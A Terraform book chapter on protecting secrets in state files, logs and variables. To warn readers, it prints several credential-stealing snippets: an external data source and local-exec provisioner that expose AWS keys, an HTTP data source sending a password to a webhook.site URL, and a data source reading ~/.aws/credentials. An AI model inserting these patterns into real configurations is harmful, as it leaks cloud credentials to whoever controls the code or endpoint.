On July 25, 2019, the Democratic Senatorial Campaign Committee (DSCC) was discovered to have exposed over 6.2 million email addresses. It was one of the largest data breaches of all time. The vast majority of exposed email addresses belonged to average Americans, although thousands of university, government, and military personnel’s emails were leaked as well. The root cause of the incident was a publicly accessible S3 bucket. Anyone with an Amazon Web Services (AWS) account could access the emails stored in a spreadsheet named EmailExcludeClinton.csv. At the time of the discovery, the data had been exposed for at least nine years, based on the last-modified date of 2010.
This homily should serve as a warning to those who fail to take information security seriously. Data breaches are enormously detrimental, not only to the public but to corporations as well. Loss of brand reputation, loss of revenue, and government-imposed fines are just some of the potential consequences. Vigilance is required because all it takes for a data breach to occur is a slight oversight, such as an improperly configured S3 bucket that hasn’t been used for years.
Security is everybody’s responsibility. But as a Terraform developer, your share of the responsibility is greater than most. Terraform is an infrastructure provisioning technology and therefore handles a lot of secrets—more than most people realize. Secrets like database passwords, personal identification information (PII), and encryption keys may all be consumed and managed by Terraform. Worse, many of these secrets appear as plaintext, either in Terraform state or in log files. Knowing how and where secrets have the potential to be leaked is critical to developing an effective counter-strategy. You have to think like a hacker to protect yourself from a hacker.
Secrets management is about keeping your secret information secret. Best practices for secrets management with Terraform, as we discuss in this chapter, include the following:
Sensitive information will inevitably find its way into Terraform state pretty much no matter what you do. Terraform is fundamentally a state-management tool, so to perform basic execution tasks like drift detection, it needs to compare previous state with current state. Terraform does not treat attributes containing sensitive data any differently than it treats non-sensitive attributes. Therefore, any and all sensitive data is put in the state file, which is stored as plaintext JSON. Because you can’t prevent secrets from making their way into Terraform state, it’s imperative that you treat the state file as sensitive and secure it accordingly. In this section, we discuss three methods for securing state files:
Although you ultimately cannot avoid secrets from wheedling their way into Terraform state, there’s no excuse for complacency. You should never expose more sensitive information than is absolutely required. If the worst were to happen and, despite your best efforts and safety precautions, the contents of your state file were to be leaked, it is better to expose one secret than a dozen (or a hundred).
Tip Fewer secrets means you have less to lose in the event of a data breach.
To minimize the number of secrets stored in Terraform state, you first have to know what can be stored in Terraform state. Fortunately, it’s not a long list. Only three configuration blocks can store stateful information (sensitive or otherwise) in Terraform: resources, data sources, and output values. Other kinds of configuration blocks (providers, input variables, local values, modules, etc.) do not store stateful data. Any of these other blocks may leak sensitive information in other ways, but at least you do not need to worry about them saving sensitive information to the state file.
Now that you know which blocks have the potential to store sensitive information in Terraform, you have to determine which secrets are necessary and which are not. Much of this depends on the level of risk you are willing to accept and the kinds of resources you are managing with Terraform. An example of a necessary secret is shown next. This code declares a Relational Database Service (RDS) database instance and passes in two secrets: var.username
and var.password
. Since both of these attributes are defined as required
, if you want Terraform to provision an RDS database, you must be willing to accept that your master username and password secret values exist in Terraform state:
resource "aws_db_instance" "database" { allocated_storage = 20 engine = "postgres" engine_version = "9.5" instance_class = "db.t3.medium" name = "ptfe" username = var.username ❶ password = var.password ❶ }
❶ username and password are attributes of the aws_db_instance resource. These are necessary secrets because it is impossible to provision this resource without storing the values in Terraform state.
Note Defining your variables as sensitive does not prevent them from being stored in Terraform state.
The following listing shows Terraform state for a deployed RDS instance. Notice that username
and password
appear in plaintext.
Listing 13.1 aws_db_instance in Terraform state
{ "mode": "managed", "type": "aws_db_instance", "name": "database", "provider": "provider.aws", "instances": [ { "schema_version": 1, "attributes": { //not all attributes are shown "password": "hunter2", ❶ "performance_insights_enabled": false, "performance_insights_kms_key_id": "", "performance_insights_retention_period": 0, "port": 5432, "publicly_accessible": false, "replicas": [], "replicate_source_db": "", "resource_id": "db-O6TUYBMS2HGAY7GKSLTL5H4JEM", "s3_import": [], "security_group_names": null, "skip_final_snapshot": false, "snapshot_identifier": null, "status": "available", "storage_encrypted": false, "storage_type": "gp2", "tags": null, "timeouts": null, "timezone": "", "username": "admin" ❷ } } ] }
❶ username and password appear as plaintext in Terraform state.
❷ username and password appear as plaintext in Terraform state.
Setting secrets on a database instance may be unavoidable, but there are plenty of avoidable situations. For example, you should never pass the RDS database username and password to a lambda function as environment variables. Consider the following code, which declares an aws_lamba_function
resource that has username
and password
set as environment variables.
Listing 13.2 Lambda function configuration code
resource "aws_lambda_function" "lambda" {
filename = "code.zip"
function_name = "${local.namespace}-lambda"
role = aws_iam_role.lambda.arn
handler = "exports.main"
source_code_hash = filebase64sha256("code.zip")
runtime = "nodejs12.x"
environment {
variables = {
USERNAME = var.username ❶
PASSWORD = var.password
}
}
}
❶ RDS database username and password set as environment variables
Since the environment block of aws_lambda_function
contains these values, they will be stored in state just as they were for the database. The difference is that while the RDS database required username
and password
to be set, the AWS Lambda function does not. The Lambda function only needs credentials to connect to the database instance at runtime.
You might think this is excessive and possibly redundant. After all, if you are declaring the RDS instance in the same configuration code as your AWS Lambda function, wouldn’t the sensitive information be stored in Terraform state regardless? And you would be right. But you would also be exposing yourself to additional vulnerabilities outside of Terraform. If you aren’t familiar with AWS Lambda, environment variables on Lambda functions are exposed to anyone with read access to that resource (see figure 13.1).
Figure 13.1 Environment variables for AWS Lambda functions are visible to anyone with read access in the console. Avoid setting secrets as environment variables in AWS Lambda whenever possible.
Granted, people with read access to your AWS account tend to be coworkers and trusted contractors, but do you really want to risk exposing sensitive information that way? I recommend adopting a zero-trust policy, even within your team. A better solution would be to read secrets dynamically from a centralized secrets store.
We can remove USERNAME
and PASSWORD
from the environment block by replacing them with a key that tells AWS Lambda where to find the secrets, such as AWS Secrets Manager. AWS Secrets Manager is a secret store not unlike Vault (Azure and Google Cloud Platform [GCP] have equivalents). To use AWS Secrets Manager, we will need to give permissions to Lambda to read from Secrets Manager and add a few lines of boilerplate to the Lambda source code. This will prevent secrets from showing up in the state file and prevent other avenues of sensitive information leakage, such as through the AWS console.
The following listing shows aws_lambda_function
refactored to use a SECRET_ID
pointing to a secret stored in AWS Secrets Manager.
Listing 13.3 Lambda function configuration code
resource "aws_lambda_function" "lambda" { filename = "code.zip" function_name = "${local.namespace}-lambda" role = aws_iam_role.lambda.arn handler = "exports.main" source_code_hash = filebase64sha256("code.zip") runtime = "nodejs12.x" environment { variables = { SECRET_ID = var.secret_id ❶ } } }
❶ No more secrets in the configuration code! This is an ID for where to fetch the secrets.
Now, in the application source code, SECRET_ID
can be used to fetch the secret at runtime (see listing 13.4).
Note For this to work, AWS Lambda needs to be given permission to fetch the secret value from AWS Secrets Manager.
Listing 13.4 Lambda function source code
package main
import (
"context"
"fmt"
"os"
"github.com/aws/aws-lambda-go/lambda"
"github.com/aws/aws-sdk-go/aws"
"github.com/aws/aws-sdk-go/aws/session"
"github.com/aws/aws-sdk-go/service/secretsmanager"
)
func HandleRequest(ctx context.Context) error {
client := secretsmanager.New(session.New())
config := &secretsmanager.GetSecretValueInput{
SecretId: aws.String(os.Getenv("SECRET_ID")),
}
val, err := client.GetSecretValue(config) ❶
if err != nil {
return err
}
// do something with secret value
fmt.Printf("Secret is: %s", *val.SecretString)
return nil
}
func main() {
lambda.Start(HandleRequest)
}
❶ Fetches the secret dynamically by ID
We formally introduce AWS Secrets Manager later when we talk about managing dynamic secrets in Terraform.
Removing unnecessary secrets is always a good idea, but it won’t prevent your state file from being exposed in the first place. To do that, you need to treat the state file as secret and gate who has access to it. After all, you don’t want just anyone accessing your state file. Users should only be able to access state files that they need access to. In general, a principle of least privilege should be upheld, meaning users and service accounts should have only the minimal privileges required to do their jobs.
In chapter 6, we did exactly this when we created a module for deploying an S3 backend. As part of this module, we restricted access to the S3 bucket to just the account that required access to it. The S3 bucket holds the state files, and although we want to give read/write access to some state files, we may not want to give that access to all users. The next listing shows an example of the policy we created for enabling least-privileged access.
Listing 13.5 IAM least-privileged policy for the S3 backend
{
"Version": "2012-10-17",
"Statement": [
{
"Sid": "",
"Effect": "Allow",
"Action": "s3:ListBucket",
"Resource": "arn:aws:s3:::tia-state-bucket"
},
{
"Sid": "",
"Effect": "Allow",
"Action": [
"s3:PutObject",
"s3:GetObject"
],
"Resource": "arn:aws:s3:::tia-state-bucket/team1/*" ❶
},
{
"Sid": "",
"Effect": "Allow",
"Action": [
"dynamodb:PutItem",
"dynamodb:GetItem",
"dynamodb:DeleteItem"
],
"Resource":
"arn:aws:dynamodb:us-west-2:215974853022:table/tia-state-lock"
}
]
}
❶ This could be further restricted with a bucket prefix if desired.
Terraform Cloud and Terraform Enterprise allow you to restrict user access to state files with team access settings. The basic idea is that users are added to teams, and the teams grant read/write/admin access to specific workspaces and their associated state files. People who are not on an authorized team will be unable to read the state file. For more information about how teams and team access work, refer to the official HashiCorp documentation (http://mng.bz/0r4p).
TIP In addition to securing state files, you can create least-privileged deployment roles for users and service accounts. We did this in chapter 12 with the helloworld.json policy.
Encryption at rest is the act of translating data into a format that cannot be decrypted except by authorized users (see figure 13.2). Even if a malicious user were to gain physical access to the machines storing encrypted data, the data would be useless to them.
Figure 13.2 Data must be encrypted every step of the way. Most Terraform backends take care of data in transit, but you are responsible for ensuring that data is encrypted at rest.
Encryption at rest is easy to enable for most backends. If you are using an S3 backend like the one we created in chapter 6, you can specify a Key Management Service (KMS) key to use client-side encryption or just let S3 use a default encryption key for server-side encryption. If you are using Terraform Cloud or Terraform Enterprise, your data is automatically encrypted at rest by default. In fact, it’s double encrypted: once with KMS and again with Vault. For other remote backends, you will need to consult the documentation to learn how to enable encryption at rest.
Insecure log files pose an enormous security risk—but, surprisingly, many people aren’t aware of the danger. By reading Terraform log files, malicious users can glean sensitive information about your deployment, such as credentials and environment variables, and use them against you (see figure 13.3). In this section, we discuss how sensitive information can be leaked through insecure log files and what you can do to prevent it.
Figure 13.3 A malicious user can steal credentials from log files to make unauthorized API calls to AWS.
People are often shocked to learn that sensitive information appears in log files. The official documentation and online blog articles focus on the importance of securing the state file, but little is said about the importance of securing logs. Let’s look at an example of how secrets can be leaked in logs. Consider the following configuration code snippet, which declares a simple “Hello World!” EC2 instance:
resource "aws_instance" "helloworld" { ami = var.ami_id instance_type = "t2.micro" tags = { Name = "HelloWorld" } }
If you were to create this resource without enabling trace logging, the logs would be short and relatively uninteresting:
$ terraform apply -auto-approve
aws_instance.helloworld: Creating...
aws_instance.helloworld: Still creating... [10s elapsed]
aws_instance.helloworld: Still creating... [20s elapsed]
aws_instance.helloworld: Creation complete after 24s [id=i-002030c2b40edd6bb]
Apply complete! Resources: 1 added, 0 changed, 0 destroyed.
On the other hand, if you were to run the same configuration code with trace logs enabled (TF_LOG=trace
), you would find information in the logs about the current caller identity, temporary signed access credentials, and response data from all requests made to deploy the EC2 instance. The following listing shows an excerpt.
Listing 13.6 sts:GetCallerIdentity in trace level logs
Trying to get account information via sts:GetCallerIdentity [aws-sdk-go] DEBUG: Request sts/GetCallerIdentity Details: ---[ REQUEST POST-SIGN ]----------------------------- POST / HTTP/1.1 Host: sts.amazonaws.com User-Agent: aws-sdk-go/1.30.16 (go1.13.7; darwin; amd64) APN/1.0 HashiCorp/1.0 Terraform/0.12.24 (+https://www.terraform.io) Content-Length: 43 Authorization: AWS4-HMAC-SHA256 Credential=AKIATESI2XGPMMVVB7XL/20200504/us-east-1/sts/aws4_request, B SignedHeaders=content-length;content-type;host;x-amz-date, ❶ Signature=c4df301a200eb46d278ce1b6b9ead1cfbe64f045caf9934a14e9b7f8c207c3f8 ❶ Content-Type: application/x-www-form-urlencoded; charset=utf-8 X-Amz-Date: 20200504T084221Z Accept-Encoding: gzip Action=GetCallerIdentity&Version=2011-06-15 ----------------------------------------------------- [aws-sdk-go] DEBUG: Response sts/GetCallerIdentity Details: ---[ RESPONSE ]-------------------------------------- HTTP/1.1 200 OK Connection: close Content-Length: 405 Content-Type: text/xml Date: Mon, 04 May 2020 07:37:21 GMT X-Amzn-Requestid: 74b2886b-43bc-475c-bda3-846123059142 ----------------------------------------------------- [aws-sdk-go] <GetCallerIdentityResponse xmlns="https://sts.amazonaws.com/doc/2011-06-15/"> <GetCallerIdentityResult> <Arn>arn:aws:iam::215974853022:user/swinkler</Arn> ❷ <UserId>AIDAJKZ3K7CTQHZ5F4F52</UserId> ❷ <Account>215974853022</Account> ❷ </GetCallerIdentityResult> <ResponseMetadata> <RequestId>74b2886b-43bc-475c-bda3-846123059142</RequestId> </ResponseMetadata> </GetCallerIdentityResponse>
❶ Temporary signed credentials that can be used to make a request on your behalf
❷ Information about the current caller identity
The temporary signed credentials that appear in the trace logs can be used to make authorized API requests (at least until they expire, which is in about 15 minutes).
The next listing demonstrates using the previous credentials to make a curl request and the response from the server.
Listing 13.7 Invoking sts:GetCallerIdentity with signed credentials
$ curl -L -X POST 'https://sts.amazonaws.com' -H 'Host: sts.amazonaws.com' AWS4-HMAC-SHA256 Credential=AKIATESI2XGPMMVVB7XL/20200504/us-east-1/sts/aws4_request, SignedHeaders=content-length;content-type;host;x-amz-date, Signature=c4df301a200eb46d278ce1b6b9ead1cfbe64f045caf9934a14e9b7f8c207c3f8' -H 'Content-Type: application/x-www-form-urlencoded; charset=utf-8' 20200504T084221Z' -H 'Accept-Encoding: gzip' --data-urlencode 'Action=GetCallerIdentity' --data-urlencode 'Version=2011-06-15' <GetCallerIdentityResponse xmlns="https://sts.amazonaws.com/doc/2011-06-15/"> <GetCallerIdentityResult> <Arn>arn:aws:iam::215974853022:user/swinkler</Arn> <UserId>AIDAJKZ3K7CTQHZ5F4F52</UserId> <Account>215974853022</Account> </GetCallerIdentityResult> <ResponseMetadata> <RequestId>e6870ff6-a09e-4479-8860-c3ca08b323b5</RequestId> </ResponseMetadata> </GetCallerIdentityResponse>
I know what you might be thinking: what if someone gets access to invoke sts:GetCallerIdentity
? Keeping it a secret is not that important—but sts:GetCallerIdentity
is just the beginning! Every API call that Terraform makes to AWS will appear in the trace logs along with the complete request and response objects. That means for the “Hello World!” deployment, signed credentials allowing someone to invoke ec2:CreateInstance
and vpc:DescribeVpcs
appear as well. Granted, these are temporary credentials that expire in 15 minutes, but risks are risks!
TIP Always turn off trace logging except when debugging.
In chapter 7, we introduced local-exec
provisioners and how they can be used to execute commands on a local machine during terraform
apply
and terraform destroy
. As previously mentioned, local-exec
provisioners are inherently dangerous and should be avoided whenever possible. Now I will give you one more reason to be wary of them: even when trace logging is disabled, local-exec
provisioners can be used to print secrets in the log files.
Consider this snippet, which declares a null_resource
with an attached local-exec
provisioner:
resource "null_resource" "uh_oh" { provisioner "local-exec" { command = <<-EOF echo "access_key=$AWS_ACCESS_KEY_ID" echo "secret_key=$AWS_SECRET_ACCESS_KEY" EOF } }
If you ran this, you would see the following during terraform
apply
(even when trace logging is disabled):
$ terraform apply -auto-approve null_resource.uh_oh: Creating... null_resource.uh_oh: Provisioning with 'local-exec'... null_resource.uh_oh (local-exec): Executing: ["/bin/sh" "-c" "echo "access_key=$AWS_ACCESS_KEY_ID" echo "secret_key=$AWS_SECRET_ACCESS_KEY" "] null_resource.uh_oh (local-exec): access_key=ASIAQHUM6YXTDSEUEMUJ ❶ null_resource.uh_oh (local-exec): ❷ secret_key=ILjkhTbflyPdxkvWJl9NV8qZXPJ+yVM3JSq3Uaz1 ❷ null_resource.uh_oh: Creation complete after 0s [id=5973892021553480485] Apply complete! Resources: 1 added, 0 changed, 0 destroyed.
Note AWS access keys are not the only things local-exec
provisioners can expose. Any secret stored on the machine running Terraform is at risk.
Somewhat related to local-exec
provisioners are external data sources. In case you aren’t aware of these dodgy characters, external data sources allow you to execute arbitrary code and return the results to Terraform. That sounds great at first because you can create custom data sources without resorting to writing your own Terraform provider. The downside is that any arbitrary code can be called, which can be extremely troublesome if you are not careful (see figure 13.4).
Figure 13.4 External data sources execute arbitrary code (such as Python, JavaScript, Bash, etc.) and return the results to Terraform. If the code is malicious, it can cause all sorts of problems before you have a chance to do anything about it.
TIP If you are interested in creating custom resources without writing your own provider, I recommend using the Shell provider for Terraform (https://github.com/scottwinkler/terraform-provider-shell; see appendix D).
External data sources are particularly nefarious because they run during terraform plan
, which means all a malicious user would need to do to gain access to all your secrets is sneak this code into your configuration and make sure terraform plan
is run. No apply
is required.
TIP Always skim through any module you want to use, even if it comes from the official module registry, to ensure that no malicious code is present.
Consider this code, which doesn’t look that bad at first glance:
data "external" "do_bad_stuff" { program = ["node", "${path.module}/run.js"] }
During terraform
plan
, this data source could run a Node.js script to execute malicious code. Here’s an example of what the external script might do:
// runKeyLogger() // stealBankingInformation() // emailNigerianPrince() console.log(JSON.stringify({ AWS_ACCESS_KEY_ID: process.env.AWS_ACCESS_KEY_ID, AWS_SECRET_ACCESS_KEY: process.env.AWS_SECRET_ACCESS_KEY, }))
When this code runs, it can do anything from installing viruses to stealing your private data to mining bitcoins. In this example, the code just returns a JSON object with the AWS access and secret access keys in tow (which is still nasty!). If you were to run this, nothing of interest would show up in the logs:
$ terraform apply -auto-approve data.external.do_bad_stuff: Refreshing state... Apply complete! Resources: 0 added, 0 changed, 0 destroyed.
But in your state file, the data would appear in plaintext:
$ terraform state show data.external.do_bad_stuff
# data.external.do_bad_stuff:
data "external" "do_bad_stuff" {
id = "-"
program = [
"node",
"./run.js",
]
result = {
"AWS_ACCESS_KEY_ID" = "ASIAQHUM6YXTDSEUEMUJ"
"AWS_SECRET_ACCESS_KEY" = "ILjkhTbflyPdxkvWJl9NV8qZXPJ+yVM3JSq3Uaz1"
}
}
That’s not the end of it. The sensitive information could also appear in the logs, if trace logging were enabled:
JSON output: [123 34 65 87 83 95 65 67 67 69 83 83 95 75 69 89 95 73 68 34 58 34 65 83 73 65 81 72 85 77 54 89 88 84 68 83 69 85 69 77 85 74 34 44 34 65 87 83 95 83 69 67 82 69 84 95 65 67 67 69 83 83 95 75 69 89 34 58 34 73 76 106 107 104 84 98 102 108 121 80 100 120 107 118 87 74 108 57 78 86 56 113 90 88 80 74 43 121 86 77 51 74 83 113 51 85 97 122 49 34 125 10]
Converting this byte array to a string yields the following JSON string:
{ "AWS_ACCESS_KEY_ID": "ASIAQHUM6YXTDSEUEMUJ", "AWS_SECRET_ACCESS_KEY": "ILjkhTbflyPdxkvWJl9NV8qZXPJ+yVM3JSq3Uaz1" }
Note External data sources are perhaps the most dangerous resources in all of Terraform. Be extremely judicious with their use, as there are many clever and devious ways that sensitive information could be leaked with them.
The HTTP provider is a utility provider for interacting with generic HTTP servers as part of Terraform configuration. It exposes a single http_http
data source that makes a GET
request to a given URL and exports information about the response. This data source is meant to merely fetch data, but it could easily be abused to steal sensitive information, much like the external data source. For example, you could do a GET
request with a query string parameter to redirect sensitive information. Effectively, whoever owns the API will get their hands on your sensitive information whenever terraform plan
is run:
variable "password" {
type = string
sensitive = true
default = "hunter2"
}
data "http" "password" {
url = "https://webhook.site/440255d9?pw=${var.password}" ❶
request_headers = {
Accept = "application/json"
}
}
❶ Performs a GET with your password against a custom API
Many of the same rules for securing state files also apply to log files: you don’t want people reading log files if it’s not required to do their job, and you want to encrypt data at rest and in transit so there is no possibility of hackers or eavesdroppers gaining access to your data. Here are some additional guidelines specific to securing log files:
Do not allow unauthorized users to run plan
or apply
against your workspace.
If you have continuous integration webhooks set up on a repository, do not allow terraform plan
to be run from pull requests (PRs) initiated from forks. This would allow hackers to run external or HTTP data sources even without you having merged a PR.
TIP Relax, I’m not trying to scare you. Not many people know about these exploits, and of the few who do, probably none have reason to cause you harm. Use your best judgment, and don’t take any unnecessary risks.
Static secrets are sensitive values that do not change, or at least do not change often. Most secrets can be classified as static secrets. Things like username and passwords, long-lived oAuth tokens, and config files containing credentials are all examples of static secrets. In this section, we discuss some of the different ways to manage static secrets as well as an overview of how to effectively rotate static secrets.
There are two major ways to pass static secrets into Terraform: as environment variables and as Terraform variables. I recommend passing secrets as environment variables whenever possible because it is far safer than the alternative. Environment variables do not show up in the state or plan files, and it’s harder for malicious users to access your sensitive values as compared to Terraform variables. In the previous section, we discussed how environment variables could be leaked with local-exec
provisioners, external data sources, and the HTTP provider, but these risks can be mitigated with careful code reviews or Sentinel policies (as we will see in section 13.5).
As safe as environment variables tend to be, with few exceptions they can only configure secrets in Terraform providers. Some rare resources have the ability to read variables from the environment as well, and you will know if you come across one.
Note As discussed in chapter 12, it’s possible to set Terraform variables with environment variables, but this does not help from a security point of view.
When configuring a Terraform provider, you definitely do not want to pass sensitive information as regular Terraform variables:
provider "aws" { region = "us-west-2" access_key = var.access_key ❶ secret_key = var.secret_key ❶ }
Configuring sensitive information in providers with Terraform variables is inherently dangerous because it opens you up to the possibility of someone redirecting secrets and using them elsewhere. Consider how easy it is for someone to output the AWS access and secret access keys simply by adding the following lines to the configuration code:
output "aws" { value = { access_key = var.access_key, secret_key = var.secret_key } }
Another possibility is saving the contents to a local_file
resource
resource "local_file" "aws" { filename = "credentials.txt" content = <<-EOF access_key = ${var.access_key} secret_key = ${var.secret_key} EOF }
or even uploading to an S3 bucket:
resource "aws_s3_bucket_object" "aws" { key = "creds.txt" bucket = var.bucket_name content = <<-EOF access_key = ${var.access_key} secret_key = ${var.secret_key} EOF }
As you can see, it doesn’t take a genius to be able to read sensitive information from Terraform variables. The avenues of attack are so numerous that it’s nearly impossible to develop an effective governance strategy. Anyone with access to modify your configuration code or run plan
and apply
on your workspace can easily steal secret values.
The recommended approach is therefore to configure providers using environment variables:
provider "aws" {
region = "us-west-2" ❶
}
❶ The access key and secret key are set as environment variables instead of Terraform variables.
It’s worth mentioning that some providers allow you to set secret information in other ways, such as through a config file. This works fine for most use cases but can be a little awkward when running Terraform in automation. You should also be aware that nothing on your machine is truly secret, config files included. Consider the following code, which declares a local_file
data source to read data from an AWS credentials file:
data "local_file" "credentials" { filename = "/Users/Admin/.aws/credentials" }
I know this example is a bit contrived, and I doubt you will ever encounter this exact situation yourself, but it is something to be aware of, nonetheless. Just because a file is “hidden” on your filesystem doesn’t mean Terraform can’t access it (see figure 13.5).
Figure 13.5 No secret is safe from the prying eye of Terraform.
Warning Malicious Terraform code can access any secret stored on a local machine running Terraform!
Despite all the shortcomings of Terraform variables, sometimes you do not have a choice in the matter. Recall the database instance we declared earlier:
resource "aws_db_instance" "database" { allocated_storage = 20 engine = "postgres" engine_version = "9.5" instance_class = "db.t3.medium" name = "ptfe" username = var.username ❶ password = var.password ❶ }
❶ Cannot be set from environment variables
If you wish to deploy an RDS database, you are stuck setting username
and password
as Terraform variables, since there is no option for using environment variables. In this case, you can still use Terraform variables to set sensitive information as long as you are smart about it.
First, I recommend running Terraform in automation, if you are not already doing so. It is imperative that a single source of truth be maintained for configuration code in Terraform state. You do not want people deploying Terraform from their local machines, even if they are using a remote backend like S3. By ensuring that Terraform runs are always linked to a specific Git commit, you prevent troublemakers from inserting malicious code without leaving behind incriminating evidence in the Git history.
After running Terraform in automation, you should seek to isolate sensitive Terraform variables from non-sensitive Terraform variables. Terraform Cloud and Terraform Enterprise make this easy because they let you mark variables as sensitive when creating through the UI/API. Figure 13.6 shows this in action.
Figure 13.6 Terraform variables can be marked as sensitive by clicking the Sensitive check box.
If you aren’t using Terraform Cloud or Terraform Enterprise, you will have to segregate sensitive Terraform variables yourself. One way to accomplish this is by deploying workspaces with multiple variable-definition files. Terraform does not automatically load variable-definition files with any name other than terraform.tfvars
, but you can specify other files using the -var-file
flag. For instance, if you have non-sensitive data stored in production.tfvars
(possibly checked into Git) and sensitive data stored in secrets.tfvars
(definitely not checked into Git), the following command will do the trick:
$ terraform apply
-var-file="secrets.tfvars"
-var-file="production.tfvars"
Sensitive variables can be defined by setting the sensitive
argument to true:
variable "password" { type = string sensitive = true }
Variables defined as sensitive appear in Terraform state but are redacted from CLI output. Consider the following code, which declares a sensitive variable and attempts to print it out with a local-exec
provisioner:
variable "password" { type = string sensitive = true default = "hunter2" } resource "null_resource" "safe" { provisioner "local-exec" { command = "echo ${var.password}" } }
This code behaves as expected, with the output being suppressed from CLI output:
$ terraform apply -auto-approve null_resource.safe: Creating... null_resource.safe: Provisioning with 'local-exec'... null_resource.safe (local-exec): (output suppressed due to sensitive value in config) null_resource.safe (local-exec): (output suppressed due to sensitive value in config) null_resource.safe: Creation complete after 0s [id=3800487680631318804] Apply complete! Resources: 1 added, 0 changed, 0 destroyed.
Defining a variable as sensitive prevents users from accidently exposing secrets but does not stop motivated individuals.
Consider instead the following code, which redirects var.password
to local _file
before reading it back and printing it with a local-exec
provisioner:
variable "password" { type = string sensitive = true default = "hunter2" } resource "local_file" "password" { ❶ filename = "password.txt" content = var.password } data "local_file" "password" { filename = local_file.password.filename ❷ } resource "null_resource" "uh_oh" { provisioner "local-exec" { command = "echo ${data.local_file.password.content}" ❸ } }
❶ Redirects a secret to a local file
❷ Reads the secret from the local file
❸ Prints the redirected secret
You might be surprised to learn that the sensitive
value is not obfuscated in the logs:
$ terraform apply -auto-approve local_file.password: Creating... local_file.password: Creation complete after 0s [id=f3bbbd66a63d4bf1747940578ec3d0103530e21d] data.local_file.password: Reading... data.local_file.password: Read complete after 0s [id=f3bbbd66a63d4bf1747940578ec3d0103530e21d] null_resource.uh_oh: Creating... null_resource.uh_oh: Provisioning with 'local-exec'... null_resource.uh_oh (local-exec): Executing: ["/bin/sh" "-c" "echo hunter2"] null_resource.uh_oh (local-exec): hunter2 null_resource.uh_oh: Creation complete after 0s [id=4946082416658079188] Apply complete! Resources: 2 added, 0 changed, 0 destroyed.
This is because Terraform does not simply perform a find and replace to scrub secrets: it scrubs references to secrets. If you go through an intermediary, Terraform can lose track of the reference, and it will not be suppressed the way it is supposed to be.
Besides local-exec
provisioners, there are many other ways to redirect sensitive variables. As mentioned before, you can upload to an S3 bucket, use an external data source, or use an HTTP data source.
TIP Despite the security limitations of sensitive variables, I recommend using them whenever possible. Using them makes it much more difficult to print variables compared to not using them.
Secrets should be rotated periodically: at least once every 90 days, or in response to known security threats. You don’t want people stealing secrets and using them indefinitely. The smaller the window of time during which a secret is valid, the better. Ideally, secrets should not even exist until they are needed (they should be created “just in time”) and should be revoked immediately after use. These are called dynamic secrets, and they are substantially more secure than static secrets.
We briefly mentioned dynamic secrets earlier, when we discussed the importance of removing unnecessary secrets from Terraform. That was more about moving secrets out of Terraform configuration and into the application layer. For dynamic secrets that cannot be moved into the application layer, the recommended approach is to use a data source that can read secrets from a secrets provider during Terraform execution.
Note If you are running Terraform in automation, you can also write custom logic for reading dynamic secrets—something that does not involve data sources.
In this section, we discuss how data sources from secrets providers like HashiCorp Vault and AWS Secrets Manager can be used to dynamically read secrets into Terraform variables.
HashiCorp Vault is a secrets-management solution that allows you to store, access, and distribute secrets by authenticating clients against various identity providers (see figure 13.7). It’s a great tool for managing static and dynamic secrets and is fast becoming the gold standard in the industry. Vault is HashiCorp’s biggest source of revenue, with over $100 million in revenue as of 2020.
Figure 13.7 Vault is a secrets-management tool that allows you to store, access, and distribute secrets by authenticating clients against various identity providers.
Operationalizing and deploying Vault is outside the scope of this book. We will talk about how to integrate Terraform with an existing Vault deployment to read dynamic secrets at runtime.
Vault exposes an API for creating, reading, updating, and deleting secrets. As you might expect, this also means there’s a Vault provider for Terraform that allows managing Vault resources. The Vault provider for Terraform is no different than any other Terraform provider; you declare what you want in code, and Terraform takes care of making the backend API calls on your behalf (see figure 13.8).
Figure 13.8 The Vault provider works just like any other Terraform provider: it integrates with the API backend and exposes resources and data sources to Terraform. Some of these data sources can be used to read dynamic secrets at runtime.
Sample code for configuring the Vault provider, reading secrets from a data source, and using these secrets to configure the AWS provider is shown in listing 13.8. Every time Terraform runs, new short-lived access credentials will be obtained from Vault.
Warning All the previous rules still apply! You still have to securely manage Terraform variables, state files, and log files.
Listing 13.8 Configuring Terraform with Vault
provider "vault" { address = var.vault_address } data "vault_aws_access_credentials" "creds" { backend = "aws" role = "prod-role" } provider "aws" { access_key = data.vault_aws_access_credentials.creds.access_key secret_key = data.vault_aws_access_credentials.creds.secret_key region = "us-west-2" }
Note To reduce the risk of exposing secrets, the Vault provider requests tokens with a relatively short time to live (TTL): 20 minutes by default. Any issued credentials are revoked when the token expires.
AWS Secrets Manager (ASM) is a notable competitor to HashiCorp Vault. It allows basic key value storage and rotation of secrets but is generally less sophisticated than Vault and lacks many of Vault’s more advanced features. The main advantage of ASM is that it’s a managed service, which means you don’t need to stand up your own infrastructure to use it; it’s ready to go right out of the box.
Note Azure and GCP both have services comparable to ASM, and the process of using them is basically the same.
Like Vault, ASM allows you to read dynamic secrets at runtime with the help of data sources. Some sample code for doing this is shown next.
Listing 13.9 Configuring Terraform with AWS Secrets Manager
data "aws_secretsmanager_secret_version" "db" { secret_id = var.secret_id } locals { creds = jsondecode(data.aws_secretsmanager_secret_version.db.secret_string) } resource "aws_db_instance" "database" { allocated_storage = 20 engine = "postgres" engine_version = "12.2" instance_class = "db.t2.micro" name = "ptfe" username = local.creds["username"] password = local.creds["password"] }
Tip If you are not already using Vault to manage secrets, AWS Secrets Manager is a great alternative.
Sentinel is an embeddable policy-as-code framework designed for automating governance, security, and compliance-based decisions. Complex legal and business requirements, which have traditionally been enforced manually by humans, can be expressed entirely as code with Sentinel polices. Sentinel can automatically prevent out-of-compliance Terraform runs from executing. For example, you normally do not want someone deploying 5,000 virtual machines without explicit authorization. With Terraform, there are no guardrails to prevent users from deploying 5,000 virtual machines. The advantage of Sentinel is that you can write a policy to automatically reject such requests before Terraform applies the changes (see figure 13.9).
Figure 13.9 Sentinel policies are checked between the plan and apply of a Terraform CI/CD pipeline. If any Sentinel policy fails, the run exits with an error condition, and the Apply stage is skipped.
Sentinel is a stand-alone HashiCorp product designed to work with all of HashiCorp’s Enterprise service offerings, including Consul, Nomad, Terraform, and Vault. It has matured over the years and finally found its place under HashiCorp’s “Better Together” narrative. But before I get you too excited about Sentinel and the great things it can do, you should know that it isn’t open source and doesn’t work with open source Terraform.
Sentinel policies are not written in HCL, as you might expect. Instead, they are written in Sentinel. Sentinel is its own domain-specific programming language, which has a passing resemblance to Python. Sentinel policies are made up of rules, which are basically just functions that return either true
or false
(pass or fail). As long as all the rules in a policy pass, the overall policy passes. If you are using Sentinel in a CI/CD pipeline, that means execution continues to the apply
.
